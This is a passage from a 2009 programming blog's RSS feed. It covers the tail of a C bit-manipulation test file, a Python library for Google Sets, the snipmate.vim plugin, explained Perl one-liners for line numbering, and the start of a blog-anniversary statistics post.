    TEST_OK(B_ISOLATE_0(x), B8(00001000));

    x = B8(01011111);
    TEST_OK(B_ISOLATE_0(x), B8(00100000));

    x = B8(01111111);
    TEST_OK(B_ISOLATE_0(x), B8(10000000));
}

void test_B_TURNON_0()
{
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_TURNON_0(x), B8(00000001));
    TEST_OK(B_TURNON_0(x), B8(00000011));
    TEST_OK(B_TURNON_0(x), B8(00000111));
    TEST_OK(B_TURNON_0(x), B8(00001111));
    TEST_OK(B_TURNON_0(x), B8(00011111));
    TEST_OK(B_TURNON_0(x), B8(00111111));
    TEST_OK(B_TURNON_0(x), B8(01111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));

    x = B8(10101010);
    TEST_OK(B_TURNON_0(x), B8(10101011));
    TEST_OK(B_TURNON_0(x), B8(10101111));
    TEST_OK(B_TURNON_0(x), B8(10111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));

    x = B8(10000000);
    TEST_OK(B_TURNON_0(x), B8(10000001));
    TEST_OK(B_TURNON_0(x), B8(10000011));
    TEST_OK(B_TURNON_0(x), B8(10000111));
    TEST_OK(B_TURNON_0(x), B8(10001111));
    TEST_OK(B_TURNON_0(x), B8(10011111));
    TEST_OK(B_TURNON_0(x), B8(10111111));
    TEST_OK(B_TURNON_0(x), B8(11111111));
}

int main()
{
    test_B8();
    test_B_EVEN();
    test_B_ODD();
    test_B_IS_SET();
    test_B_SET();
    test_B_UNSET();
    test_B_TOGGLE();
    test_B_TURNOFF_1();
    test_B_ISOLATE_1();
    test_B_PROPAGATE_1();
    test_B_ISOLATE_0();
    test_B_TURNON_0();

    TEST_END;

    return error_count ? EXIT_FAILURE : EXIT_SUCCESS;
}
</pre>
<div class="download">
<div class="download-title">Download &#8220;<strong>bithacks.h</strong>&#8221; header file:</div>
<p>Download: <a href="http://www.catonmat.net/download/bithacks.h" title="Version v1.0 downloaded 876 times" rel="enclosure">bithacks.h</a><br />
Downloaded: 876 times.<br />
Download url: http://www.catonmat.net/download/bithacks.h</p>
<p>Download: <a href="http://www.catonmat.net/download/bithacks-test.c" title="Version v1.0 downloaded 583 times" rel="enclosure">bithacks-test.c</a><br />
Downloaded: 583 times.<br />
Download url: http://www.catonmat.net/download/bithacks-test.c</p>
</div>
<p>The next post about this topic will be on advanced bithacks and extending bithacks.h with these new, advanced bithacks.</p>
<p>Have fun!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=H_sH2aHLrFU:NL8hy5-vG8w:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=H_sH2aHLrFU:NL8hy5-vG8w:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=H_sH2aHLrFU:NL8hy5-vG8w:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=H_sH2aHLrFU:NL8hy5-vG8w:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=H_sH2aHLrFU:NL8hy5-vG8w:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=H_sH2aHLrFU:NL8hy5-vG8w:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=H_sH2aHLrFU:NL8hy5-vG8w:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/H_sH2aHLrFU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/bit-hacks-header-file/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/bit-hacks-header-file/</feedburner:origLink></item>
		<item>
		<title>Python Library for Google Sets</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/8WRFcXXfzEg/</link>
		<comments>http://www.catonmat.net/blog/python-library-for-google-sets/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 15:00:38 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>google</category><category>google sets</category><category>python</category><category>xgoogle</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/python-library-for-google-sets/</guid>
		<description><![CDATA[As promised in my previous post on xgoogle library, I have added a module to get results from Google Sets.
Google Sets allows to automatically create groups of related items from a few example items. For example, you feed it &#8220;red, green, blue,&#8221; and it will predict other colors such as &#8220;yellow, black, white, brown, etc.&#8221;
One [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/03/google-python-search-library.jpg' alt='Google Python Search Library' class='post-icon' align='left' />As promised in my previous post on <a href="http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/">xgoogle library</a>, I have added a module to get results from <a href="http://labs.google.com/sets">Google Sets</a>.</p>
<p>Google Sets allows to automatically create groups of related items from a few example items. For example, you feed it &#8220;<a href="http://labs.google.com/sets?q1=red&#038;q2=green&#038;q3=blue&#038;btn=Small+Set+%2815+items+or+fewer%29">red, green, blue,</a>&#8221; and it will predict other colors such as &#8220;yellow, black, white, brown, etc.&#8221;</p>
<p>One of the most fascinating applications that this library can be used for is <a href="http://www.infosecwriters.com/hhworld/hh10/dns.htm">predicting domain names</a>. Most sysadmins have a coherent naming policy for their systems. For example, a sysadmin at a university might call his machines &#8220;psychology.university.edu&#8221;, &#8220;art.university.edu&#8221;, &#8220;geography.university.edu&#8221;, etc. Now, if we feed these names &#8220;<a href="http://labs.google.com/sets?hl=en&#038;q1=psychology&#038;q2=art&#038;q3=geography&#038;q4=&#038;q5=&#038;btn=Small+Set+%2815+items+or+fewer%29">psychology, art, geography</a>&#8221; to Google Sets, it would come up with more names such as &#8220;history, mathematics, biology, and others&#8221;. Now we can do DNS scans to find if there really are such machines. This is a pretty powerful method for reconnaissance.</p>
<p>There are many other interesting applications. Black hat SEO&#8217;s may use it to stuff their pages with related keywords and thus rank for more words on search engines. Linguists can use it for various natural language processing problems. Various word guessing games can be created.</p>
<p>But my personal goal in writing this library was to use it for my English language perfection and correction tool that I will release in one of the next posts about this project. I wrote more about this idea in the <a href="http://www.catonmat.net/blog/python-library-for-google-search/">introductory post of xgoogle library</a>. Please see that post for more info.</p>
<p>The new module is called &#8220;<strong>googlesets</strong>&#8220;, and to use it, import &#8220;<strong>GoogleSets</strong>&#8221; and create an object of this type. Pass the list of items to create the prediction from to the constructor. Then use &#8220;<strong>get_results</strong>()&#8221; member function to get the list of predicted items. It returns a list of Unicode strings, so make sure to use a proper encoding when outputting them.</p>
<p>Here is an example usage of the new module. It finds items related to programming languages &#8220;python&#8221; and &#8220;perl&#8221;:</p>
<pre>
from xgoogle.googlesets import GoogleSets
gs = GoogleSets(['python', 'perl'])
items = gs.get_results()
for item in items:
  print item.encode('utf8')
</pre>
<p>Output:</p>
<pre>
python
perl
php
ruby
java
javascript
c++
c
cgi
tcl
c#
</pre>
<p>The output matches that of Google Sets itself:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/08/google-sets-predicted-items-python-perl.jpg' alt='Google Sets Predicted Items from Perl and Python' />
</div>
<p>See the readme.txt file in the <a href="http://www.catonmat.net/download/xgoogle.zip">xgoogle archive</a> for more examples.</p>
<div class="download">
<div class="download-title">Download &#8220;<strong>xgoogle</strong>&#8221; library:</div>
<p>Download: <a href="http://www.catonmat.net/download/xgoogle.zip" title="Version 1.3 downloaded 2788 times" rel="enclosure">xgoogle library (.zip)</a><br />
Downloaded: 2788 times.<br />
Download url: http://www.catonmat.net/download/xgoogle.zip</p>
</div>
<p>Have fun and let me know if you find this library useful in any way in your own projects.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=8WRFcXXfzEg:P-aTdowxNA8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=8WRFcXXfzEg:P-aTdowxNA8:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=8WRFcXXfzEg:P-aTdowxNA8:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=8WRFcXXfzEg:P-aTdowxNA8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=8WRFcXXfzEg:P-aTdowxNA8:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=8WRFcXXfzEg:P-aTdowxNA8:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=8WRFcXXfzEg:P-aTdowxNA8:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/8WRFcXXfzEg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/python-library-for-google-sets/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/python-library-for-google-sets/</feedburner:origLink></item>
		<item>
		<title>Vim Plugins You Should Know About, Part IV: snipmate.vim</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/1IIfoD3zB-w/</link>
		<comments>http://www.catonmat.net/blog/vim-plugins-snipmate-vim/#comments</comments>
		<pubDate>Tue, 04 Aug 2009 03:25:09 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>michael sanders</category><category>plugin</category><category>snipmate</category><category>vim</category><category>vim plugin</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/vim-plugins-snipmate-vim/</guid>
		<description><![CDATA[This is the fourth post in the article series &#8220;Vim Plugins You Should Know About&#8220;. This time I am going to introduce you to a plugin called &#8220;snipmate.vim&#8220;.
If you are intrigued by this topic, I suggest that you subscribe to my posts! For the introduction and first post in this article series, follow this link [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2008/12/vim-plugins-surround-vim.gif' alt='Vim Plugins, surround.vim' class="post-icon" align="left" />This is the fourth post in the article series &#8220;<strong>Vim Plugins You Should Know About</strong>&#8220;. This time I am going to introduce you to a plugin called &#8220;<strong>snipmate.vim</strong>&#8220;.</p>
<p>If you are intrigued by this topic, I suggest that you <a href="http://www.catonmat.net/feed/">subscribe to my posts</a>! For the introduction and first post in this article series, follow this link - <a href="http://www.catonmat.net/blog/vim-plugins-surround-vim/">Vim Plugins You Should Know About, Part I: surround.vim</a>.</p>
<p>Snipmate.vim is probably the best snippets plugin for vim. A snippet is a piece of often-typed text or programming construct that you can insert into your document by using a trigger followed by a &lt;tab&gt;. It was written by Michael Sanders. He says he modeled this plugin after <a href="http://macromates.com/">TextMate</a>&#8217;s snippets. </p>
<p>Here is an example usage of snipmate.vim. If you are a C programmer, then one of the most often used forms of a loop is &#8220;for (i=0; i&lt;n; i++) { &#8230; }&#8221;. Without snippets you&#8217;d have to type this out every time. Even though it takes just another second, these seconds can add to minutes throughout the day and minutes can add to hours over longer periods of time. Why waste your time this way? With snippets you can type just &#8220;for&lt;tab>&#8221; and snipmate will insert this whole construct in your source code automatically! If &#8220;i&#8221; or &#8220;n&#8221; weren&#8217;t the variable you wanted to use, you can now use &lt;tab> and &lt;shift-tab> to jump to next/previous item in the loop and rename them!</p>
<p>Michael also created an introduction video for his plugin where he demonstrates how to use it. Check it out:</p>
<div class="center-aligner">
<object width="400" height="225">
<param name="allowfullscreen" value="true" />
<param name="allowscriptaccess" value="always" />
<param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=3535418&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=3535418&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="225"></embed></object>
</div>
<h2 style="margin-bottom:10px">How to install snipmate.vim?</h2>
<p>To get the latest version:</p>
<ul>
<li>1. Download <a href="http://www.vim.org/scripts/script.php?script_id=2540">snipmate.zip</a>.</li>
<li>2. Extract snipmate.zip to ~/.vim (on Unix/Linux) or ~\vimfiles (on Windows).</li>
<li>3. Run :helptags ~/.vim/doc (on Unix/Linux) or :helptags ~/vimfiles/doc (on Windows) to rebuild the tags file (so that you can read :help snipmate.)</li>
<li>4. Restart Vim.</li>
</ul>
<p>The plugin comes with predefined snippets for more than a dozen languages (C, C++, HTML, Java, JavaScript, Objective C, Perl, PHP, Python, Ruby, Tcl, Shell, HTML, Mako templates, LaTeX, VimScript). Be sure to check out the snippet files in the &#8220;snippets&#8221; directory under your ~/.vim or ~\vimfiles directory.</p>
<p>If you need to define your own snippets (which you most likely will need), create a new file named &#8220;language-foo.snippets&#8221; in the &#8220;snippets&#8221; directory. For example, to define your own snippets for C language, you&#8217;d create a file called &#8220;c-foo.snippets&#8221; and place snippets in it.</p>
<p>To learn about snipmate snippet syntax, type &#8220;:help snipmate&#8221; and locate the syntax section in the help file.</p>
<h2 style="margin-bottom:10px">Have Fun!</h2>
<p>Have fun with this time saving plugin! </p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=1IIfoD3zB-w:kbqBS2sFOSI:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=1IIfoD3zB-w:kbqBS2sFOSI:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=1IIfoD3zB-w:kbqBS2sFOSI:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=1IIfoD3zB-w:kbqBS2sFOSI:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=1IIfoD3zB-w:kbqBS2sFOSI:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=1IIfoD3zB-w:kbqBS2sFOSI:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=1IIfoD3zB-w:kbqBS2sFOSI:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/1IIfoD3zB-w" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/vim-plugins-snipmate-vim/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/vim-plugins-snipmate-vim/</feedburner:origLink></item>
		<item>
		<title>Famous Perl One-Liners Explained, Part II: Line Numbering</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/gOx94z_Gm6c/</link>
		<comments>http://www.catonmat.net/blog/perl-one-liners-explained-part-two/#comments</comments>
		<pubDate>Fri, 31 Jul 2009 06:05:46 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>cat</category><category>end</category><category>grep</category><category>line numbering</category><category>list context</category><category>one liner</category><category>one liners</category><category>perl</category><category>perl1line.txt</category><category>print</category><category>printf</category><category>scalar</category><category>scalar context</category><category>special variables</category><category>wc</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/perl-one-liners-explained-part-two/</guid>
		<description><![CDATA[This is the second part of a seven-part article on famous Perl one-liners. In this part I will create various one-liners for line numbering. See part one for introduction of the series.
Famous Perl one-liners is my attempt to create &#8220;perl1line.txt&#8221; that is similar to &#8220;awk1line.txt&#8221; and &#8220;sed1line.txt&#8221; that have been so popular among Awk and [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/02/perl-one-liners.jpg' alt='Perl One Liners' class='post-icon' align='left' />This is the second part of a seven-part article on <strong>famous Perl one-liners</strong>. In this part I will create various one-liners for <strong>line numbering</strong>. See <a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">part one</a> for introduction of the series.</p>
<p>Famous Perl one-liners is my attempt to create &#8220;<strong>perl1line.txt</strong>&#8221; that is similar to &#8220;<a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-one/">awk1line.txt</a>&#8221; and &#8220;<a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-one/">sed1line.txt</a>&#8221; that have been so popular among Awk and Sed programmers.</p>
<p>The article on famous Perl one-liners will consist of at least seven parts:</p>
<ul>
<li><a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">Part I: File spacing</a>.</li>
<li><strong>Part II: Line numbering (this part)</strong>.</li>
<li><a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-three/">Part III: Calculations</a>.</li>
<li>Part IV: String creation. Array creation.</li>
<li>Part V: Text conversion and substitution.</li>
<li>Part VI: Selective printing and deleting of certain lines.</li>
<li>Part VII: Release of perl1line.txt.</li>
</ul>
<p>The one-liners will make heavy use of Perl special variables. A few years ago I compiled all the Perl special variables in a single file and called it <a href="http://www.catonmat.net/blog/perls-special-variable-cheat-sheet/">Perl special variable cheat-sheet</a>. Even tho it&#8217;s mostly copied out of <a href="http://perldoc.perl.org/perlvar.html">perldoc perlvar</a>, it&#8217;s still handy to have in front of you. Print it!</p>
<p>And here are today&#8217;s one-liners:</p>
<h2 style="margin-bottom: 10px">Line Numbering</h2>
<p><strong>9. Number all lines in a file.</strong></p>
<pre>perl -pe '$_ = "$. $_"'</pre>
<p>As I explained in <a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">the first one-liner</a>, &#8220;-p&#8221; causes Perl to assume a loop around the program (specified by &#8220;-e&#8221;) that reads each line of input into the &#8221; $_ &#8221; variable, executes the program and then prints the &#8221; $_ &#8221; variable.</p>
<p>In this one-liner I simply modify &#8221; $_ &#8221; and prepend the &#8221; $. &#8221; variable to it. The special variable &#8221; $. &#8221; contains the current line number of input.</p>
<p>The result is that each line gets its line number prepended.</p>
<p><strong>10. Number only non-empty lines in a file.</strong></p>
<pre>perl -pe '$_ = ++$a." $_" if /./'</pre>
<p>Here we employ the &#8220;action if condition&#8221; statement that executes &#8220;action&#8221; only if &#8220;condition&#8221; is true. In this case the condition is a regular expression &#8220;/./&#8221;, which matches any character except newline (that is, it matches a non-empty line); and the action is &#8221; $_ = ++$a.&#34; $_&#34; &#8220;, which prepends variable &#8221; $a &#8221; incremented by one to the current line. As we didn&#8217;t use strict pragma, $a was created automatically.</p>
<p>The result is that at each non-empty line &#8221; $a &#8221; gets incremented by one and prepended to that line. And at each empty line nothing gets modified and the empty line gets printed as is.</p>
<p><strong>11. Number and print only non-empty lines in a file (drop empty lines).</strong></p>
<pre>perl -ne 'print ++$a." $_" if /./'</pre>
<p>This one-liner uses the &#8220;-n&#8221; program argument that places the line in &#8221; $_ &#8221; variable and then executes the program specified by &#8220;-e&#8221;. Unlike &#8220;-p&#8221;, it does not print the line after executing code in &#8220;-e&#8221;, so we have to call &#8220;print&#8221; explicitly to get it printed.</p>
<p>The one-liner calls &#8220;print&#8221; only on lines that have at least one character in them. And exactly like in the previous one-liner, it increments the line number in variable &#8221; $a &#8221; by one for each non-empty line.</p>
<p>The empty lines simply get ignored and never get printed.</p>
<p><strong>12. Number all lines but print line numbers only non-empty lines.</strong></p>
<pre>perl -pe '$_ = "$. $_" if /./'</pre>
<p>This one-liner is similar to one-liner #10. Here I modify the &#8221; $_ &#8221; variable that holds the entire line only if the line has at least one character. All other lines (empty ones) get printed without line numbers.</p>
<p><strong>13. Number only lines that match a pattern, print others unmodified.</strong></p>
<pre>perl -pe '$_ = ++$a." $_" if /regex/'</pre>
<p>Here we again use the &#8220;action if condition&#8221; statement but the condition in this case is a pattern (regular expression) &#8220;/regex/&#8221;. The action is the same as in one-liner #10. I don&#8217;t want to repeat, see #10 for explanation.</p>
<p><strong>14. Number and print only lines that match a pattern.</strong></p>
<pre>perl -ne 'print ++$a." $_" if /regex/'</pre>
<p>This one-liner is almost exactly like #11. The only difference is that it prints numbered lines that match only &#8220;/regex/&#8221;.</p>
<p><strong>15. Number all lines, but print line numbers only for lines that match a pattern.</strong></p>
<pre>perl -pe '$_ = "$. $_" if /regex/'</pre>
<p>This one-liner is similar to the previous one-liner and to one-liner #12. Here the line gets its line number prepended if it matches a /regex/, otherwise it just gets printed without a line number.</p>
<p><strong>16. Number all lines in a file using a custom format (emulate cat -n).</strong></p>
<pre>perl -ne 'printf "%-5d %s", $., $_'</pre>
<p>This one-liner uses the formatted print &#8220;printf&#8221; function to print the line number together with line. In this particular example the line numbers are left aligned on 5 char boundary.</p>
<p>Some other nice format strings are &#8220;%5d&#8221; that right-aligns line numbers on 5 char boundary and &#8220;%05d&#8221; that zero-fills and right-justifies the line numbers.</p>
<p>Here my <a href="www.catonmat.net/download/perl.pack.unpack.printf.cheat.sheet.pdf">Perl printf cheat sheet</a> might come handy that lists all the possible format specifiers.</p>
<p><strong>17. Print the total number of lines in a file (emulate wc -l).</strong></p>
<pre>perl -lne 'END { print $. }'</pre>
<p>This one-liner uses the &#8220;END&#8221; block that Perl probably took as a feature from Awk language. The END block gets executed after the program has executed. In this case the program is the hidden loop over the input that was created by the &#8220;-n&#8221; argument. After it has looped over the input, the special variable &#8221; $. &#8221; contains the number of lines there was in the input. The END block prints this variable. The &#8221; -l &#8221; parameter sets the output record separator for &#8220;print&#8221; to a newline (so that we didn&#8217;t have to print &#8220;$.\n&#8221;).</p>
<p>Another way to do the same is:</p>
<pre>perl -le 'print $n=()=&lt;&gt;'</pre>
<p>This is a tricky one, but easy to understand if you know about Perl contexts. In this one-liner the &#8221; ()=&lt;&gt; &#8221; part causes the &lt;&gt; operator (the diamond operator) to evaluate in list context, that causes the diamond operator to read the whole file in a list. Next, &#8221; $n &#8221; gets evaluated in scalar context. Evaluating a list in a scalar context returns the number of elements in the list. Thus the &#8221; $n=()=&lt;&gt; &#8221; construction is equal to the number of lines in the input, that is number of lines in the file. The print statement prints this number out. The &#8221; -l &#8221; argument makes sure a newline gets added after printing out this number.</p>
<p>This is the same as writing the following, except longer:</p>
<pre>perl -le 'print scalar(()=&lt;&gt;)'</pre>
<p>And completely obvious version:</p>
<pre>perl -le 'print scalar(@foo=&lt;&gt;)'</pre>
<p>Yet another way to do it:</p>
<pre>perl -ne '}{print $.'</pre>
<p>This one-liner uses the eskimo operator &#8220;}{&#8221; in conjunction with &#8220;-n&#8221; command line argument. As I explained in one-liner #11, the &#8220;-n&#8221; argument forces Perl to assume a &#8221; while(&lt;&gt;) { } &#8221; loop around the program. The eskimo operator forces Perl to escape the loop, and the program turns out to be:</p>
<pre>
while (<>) {
}{                    # eskimo operator here
    print $.;
}
</pre>
<p>It&#8217;s easy to see that this program just loops over all the input and after it&#8217;s done doing so, it prints the &#8221; $. &#8220;, which is the number of lines in the input.</p>
<p><strong>18. Print the number of non-empty lines in a file.</strong></p>
<pre>perl -le 'print scalar(grep{/./}&lt;&gt;)'</pre>
<p>This one-liner uses the &#8220;grep&#8221; function that is similar to the grep Unix command. Given a list of values, &#8221; grep {condition} &#8221; returns only those values that match condition. In this case the condition is a regular expression that matches at least one character, so the input gets filtered and the &#8220;grep{/./}&#8221; returns all lines that were non empty. To get the number of characters we evaluate the list in scalar context and print the result. (As I mentioned in the previous one-liner list in scalar context evaluates to number of elements in the list).</p>
<p>A golfer&#8217;s version of this one-liner would be to replace &#8220;scalar()&#8221; with &#8221; ~~ &#8221; (double bitwise negate), thus it can be shortened:</p>
<pre>perl -le 'print ~~grep{/./}&lt;&gt;'</pre>
<p>This can be made even shorter:</p>
<pre>perl -le 'print~~grep/./,&lt;&gt;'</pre>
<p><strong>19. Print the number of empty lines in a file.</strong></p>
<pre>perl -lne '$a++ if /^$/; END {print $a+0}'</pre>
<p>Here I use variable <q> $a </q> to count how many empty lines have I encountered. Once I have finished looping over all the lines, I print the value of $a in the END block. I use &#8221; $a+0 &#8221; construction to make sure &#8221; 0 &#8221; gets output if no lines were empty.</p>
<p>I could have also modified the previous one-liner:</p>
<pre>perl -le 'print scalar(grep{/^$/}&lt;&gt;)'</pre>
<p>Or written it with &#8221; ~~ &#8220;:</p>
<pre>perl -le 'print ~~grep{/^$/}&lt;&gt;'</pre>
<p>These last two versions are not as effective, as they would read the whole file in memory. Where as the first one would do it line by line.</p>
<p><strong>20. Print the number of lines in a file that match a pattern (emulate grep -c).</strong></p>
<pre>perl -lne '$a++ if /regex/; END {print $a+0}'</pre>
<p>This one-liner is basically the same as the previous one, except it increments the line counter $a by one in case a line matches a regular expression /regex/.</p>
<h2 style="margin-bottom: 10px">Have Fun!</h2>
<p>Have fun with these one-liners. These were really easy this time. The next part is going to be about various calculations.</p>
<p><strong>Can you think of other numbering operations that I did not include here?</strong></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=gOx94z_Gm6c:IMTt0A5YQyw:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=gOx94z_Gm6c:IMTt0A5YQyw:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=gOx94z_Gm6c:IMTt0A5YQyw:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=gOx94z_Gm6c:IMTt0A5YQyw:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=gOx94z_Gm6c:IMTt0A5YQyw:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=gOx94z_Gm6c:IMTt0A5YQyw:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=gOx94z_Gm6c:IMTt0A5YQyw:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/gOx94z_Gm6c" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/perl-one-liners-explained-part-two/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/perl-one-liners-explained-part-two/</feedburner:origLink></item>
		<item>
		<title>Two Years of Blogging</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/qiPo_NXaNWc/</link>
		<comments>http://www.catonmat.net/blog/two-years-of-blogging/#comments</comments>
		<pubDate>Mon, 27 Jul 2009 05:25:02 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Misc]]></category>
<category>blogging</category><category>feedburner</category><category>google analytics</category><category>statcounter</category><category>statistics</category><category>traffic</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/two-years-of-blogging/</guid>
		<description><![CDATA[Holy smokes! It has now been two years since I started this blog. It seems almost like yesterday when I posted the &#8220;A Year of Blogging&#8221; article. And now it&#8217;s two! With this post I&#8217;d like to celebrate the 2nd birthday and share various interesting statistics that I managed to gather.
During this year (July 20, [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/two-years-of-blogging.jpg' alt='A Year of Blogging' class="post-icon" align="left" />Holy smokes! It has now been two years since I started this blog. It seems almost like yesterday when I posted the &#8220;<a href="http://www.catonmat.net/blog/a-year-of-blogging/">A Year of Blogging</a>&#8221; article. And now it&#8217;s two! With this post I&#8217;d like to celebrate the 2nd birthday and share various interesting statistics that I managed to gather.</p>
<p>During this year (July 20, 2008 - July 26, 2009) I wrote <strong>55 posts</strong>, which received around <strong>1000 comments</strong>. According to <a href="http://www.statcounter.com/">StatCounter</a> and <a href="http://www.google.com/analytics/">Google Analytics</a> my blog was visited by <strong>1,050,000 unique people</strong> who <strong>viewed 1,700,000 pages</strong>. Wow, 1 million visitors! That&#8217;s very impressive!</p>
<p>Here is a Google Analytics graph of monthly page views for the last year (click for a larger version):</p>
<div class="center-aligner">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/page-views-per-month-large.jpg' title='Catonmat.Net Page Views Per Month (Second Year of Blogging)'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/page-views-per-month-small.jpg' alt='Catonmat.Net Page Views Per Month (Second Year of Blogging)' /></a>
</div>
<p>In the last three months I did not manage to write much and you can see how that reflected on the page views. A good lesson to be learned is to be persistent and keep writing articles consistently.</p>
<p>Here is the same graph with two years of data, showing a complete picture of my blog&#8217;s growth:</p>
<div class="center-aligner">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/page-views-per-month-two-years-large.jpg' title='Catonmat.Net Page Views Per Month (Two Years of Blogging)'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/page-views-per-month-two-years-small.jpg' alt='Catonmat.Net Page Views Per Month (Two Years of Blogging)' /></a>
</div>
<p>I like this seemingly linear growth. I hope it continues the same way the next year!</p>
<p>Here are the <strong>top 5 referring sites</strong> that my visitors came from:</p>
<ul>
<li><a href="http://reddit.com/">reddit</a> (292,147 visitors).</li>
<li><a href="http://www.stumbleupon.com/">stumbleupon</a> (69,575 visitors).</li>
<li><a href="http://news.ycombinator.com/">hacker news</a> (47,595 visitors).</li>
<li><a href="http://delicious.com/">delicious</a> (27,109 visitors).</li>
<li><a href="http://www.dzone.com/">dzone</a> (15,898 visitors).</li>
</ul>
<p>And here are the <strong>top 5 referring blogs</strong>:</p>
<ul>
<li><a href="http://www.scottklarr.com/">Scott Klarr&#8217;s blog</a> (7,848 visitors).</li>
<li><a href="http://freescienceonline.blogspot.com">My Free Science Online blog</a> (6,284 visitors).</li>
